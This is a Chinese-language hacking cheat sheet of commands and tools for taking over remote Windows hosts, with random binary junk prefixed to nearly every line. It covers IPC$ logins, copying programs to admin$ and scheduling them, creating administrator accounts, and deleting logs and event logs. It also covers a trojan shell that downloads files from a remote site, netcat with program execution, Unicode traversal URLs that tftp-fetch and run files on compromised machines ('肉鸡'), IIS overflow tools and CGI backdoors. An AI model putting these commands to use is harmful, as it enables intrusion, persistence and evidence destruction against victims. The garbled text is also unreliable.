网管和黑客都必须知道的命令
z~L��(kf�4 常用的几条NET命令:
�gg��Jn oL �O|?>��rK� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
jUI'F4.5x- �v�UvI�Z�a (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
aJOhji<b#L �MY4cMMjp~ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�zg0)�9�br =d�.Z�:L9d (查看远程主机时间) net time \\IP地址
{ >bw��:^F FJ��p~8
x= (定时启动某个程序) at \\IP地址 02:18 readme.exe
>��q[�(�UV ��dilR��L, (查看共享) net view \\IP地址
qx5�.L��iF rr�wBsa�3� (查看netbios工作组列表) nbtstat -A IP地址
"^��Tb�8! �;
R&wr�_% (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
;6U=f�Bp7< K82p�Wp�R� (这两条把自己增加到管理员组): net user 用户名 密码 /add
)(�_�}60� s�ZFj�kfak net localgroup Administrators 用户名 /add
}�O<=!^Y;A �%�m�t|Dl� (断开连接) net use \\IP地址\ipc$ /delete
|�94"bDL3~ }��R�;.�~F 扫尾:
3/@7$��nV y5R�c�JM�� del C:\winnt\system32\logfiles\*.*
Tc ��T%[h! ��'�n#�;~� del C:\winnt\ssytem32\config\*.evt
u��qXvN'Jr 1<\@i{;xsU del C:\winnt\system32\dtclog\*.*
M0S}-eXc5� SQ1.�jcWW[ del C:\winnt\system32\*.log
k/�u6Cw0�/ o;D�87E6Z del C:\winnt\system32\*.txt
tUDO��L-Tv .M�Xz���nz del C:\winnt\*.txt
'0p 5|�[ZD py�]m^)�yc del C:\winnt\*.log
c'vxT<8fWW (es+VI2!&C 一、netsvc.exe
�ic%<���39 +=)<
�S�u. 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
}�f��+If{� l|/��h4BJ' netsvc /list \\IP地址
#Ne<��=ayS G{��pf�yfF netsvc schedule \\IP地址 /query
�m$�NBG�w P|��!G�XkS netsvc \\IP地址 schedule /start
`�kpX}cKK} �X��2}\i5{ 二、OpenTelnet.exe
hJ (��Q^�Z 5I�OOV��Yl 远程启动主机的Telnet服务,并绑定端口到7878,例如:
`|X�E��� B [V|�,O'X ~ OpenTelnet \\IP地址 用户名 密码 1 7878
E!8F��Zv8� _[<R<�&�jG 然后就可以telnet到主机的7878端口,进入DOS方式下:
>8"oO[U�5> E3�X:{�h/ telnet IP地址 7878
'nz;|�6u�C G�Lp2
?fon 三、winshell.exe
#�5�wO�gOv h�q6�B
�pE 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
jr|(K��*;� r/$+'~apTk p Path (查看winshell主程序的路径信息)
�c*-�8h�{} v~�H�1Il_+ b reBoot (重新启动机器)
mS����p�-� *`mP�Pts}� d shutDown (关闭机器)
zH0%;�
o�} ��yM}}mypS s Shell (执行后你就会看到可爱的“C:\>”)
�9�z$�]h�l WS�/^W�xRY x eXit (退出本次登录会话,此命令并不终止winshell的运行)
z\���Rs?v" 3l�_Ko�%qS CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
`MA�e�e8u' X/�gI��H/ 四、3389登陆器,GUI方式登录远程主机的
g�bsRf&4�h y>Zvos�e�� 五、elsave.exe
!
@{�rk��p 1�P.
W �34 事件日志清除工具
�W=c7>�s0> �Nwr�.mtvh elsave -s \\IP地址 -l "application" -C
)�@09Y_�9r �X�^r5�su? elsave -s \\IP地址 -l "system" -C
\�V
�� /s� ���SpPG��� elsave -s \\IP地址 -l "security" -C
a��n_qE}P� zl�F*F8>�m 执行后成功清除应用程序日志,系统日志,安全日志
L$�=@j_V�2 ](� V+ qj� 六、hbulot.exe
L-hK(W!8pt x|d Xa0=N_ 开启win2kserver和winxp的3389服务
Z.a�m^Q^Y! A{�iI�,IFe hbulot [/r]
8/,m�8UOY� uSLO"\zysX 使用/r表示安装完成后自动重起目标使设置生效。
!
�E`�Tt[ �vA�2@Db}� 七、nc.exe(netcat.exe)
9uV/G7G�eq \(Dq=U�zQI 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
l+D��l~o�} (��#�Z2��� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
,],"t�zKtE F��vf308[� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
S~d_SU~�>` IT!�
a)��d 参数:
�&I
Iw�>,, 1�mh�X�3�� -e prog 程序重定向,一旦连接,就执行 [危险!!]
�t
�j&+H�C :@jhe8�'�w -g gateway source-routing hop point[s], up to 8
SweaE���Rl EAn}8#r'(8 -G num source-routing pointer: 4, 8, 12, ...
>y m�MQEX` U��_�v{�Vs -h 帮助信息
)67_���yHW `au('
�xi< -i secs 延时的间隔
/%E��Kq+ZP >�^LVj[.1� -l 监听模式,用于入站连接
C9��E l {f )�A:2�y +� -n 指定数字的IP地址,不能用hostname
��%�y)5�:] /Z�qBO*�]� -o file 记录16进制的传输
�zWo�Pa�,
�3�v)�v92; -p port 本地端口号
+(0�Fa�b8g >�8�_#L2@� -r 任意指定本地及远程端口
Y:[W�wX�| �Ja>�UcE29 -s addr 本地源地址
cN0|! nm*� W.iL!x.�B@ -u UDP模式
R#i|n�<��x 0@d�)DLM?� -v 详细输出——用两个-v可得到更详细的内容
x���x0s�`5 qg#TE-Y��` -w secs timeout的时间
DE|r~TQ��� aDFu!PLB{) -z 将输入输出关掉——用于扫描时
�@P#u��H5U 八、TFTPD32.EXE
%��ANo^~�8 .yE!,^j.gB 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
O( �G|fs V#�.;OtF] http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
'c<vj
jI�g /%C6e
)7BL 然后可以直接令文件运行:
��8:;_MBt "'h?O*V]u{ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
b/Y9f�Q��n :�-ZE~b�HJ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�p.^�mOkpt �z"*���X/T 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
UZ0fw@R��M I��G0$Ot�G 一、一 Xscan命令行运行参数说明:
:VP4|H#SP� nkTH#WTfR� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
-NtT@ �+AE [���Av#Z)R 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�f�N~kd�m. �Mnyg�:y*= xscan -file <主机列表文件名> <检测项目> [其他选项]
bi�G=4?Xl Tl�5�K'��3 其中<检测项目> 含义如下:
zqfv|3-�!} D�rLNY�"Zq -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
}1�]�/dCv $T{,�3;k�t -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
��*6�^|�i} ���e`k6YO -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
��fL.�;-�� =MD�ir�$1Z -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
z�I�t-��mU U^vQr%ha -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
s^ rO I~�� Z�Oc1 v��j [其他选项] 含义如下:
f�iOc;��d8 J01w\#62pQ -v: 显示详细扫描进度
7)$U��>|=� "�;}�Lf1M9 -p: 跳过Ping不通的主机
X).UvP�Z/� 35�z]pn%L -o: 跳过没有检测到开放端口的主机
w]Goe�Ig({ y�i<&'L;�� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
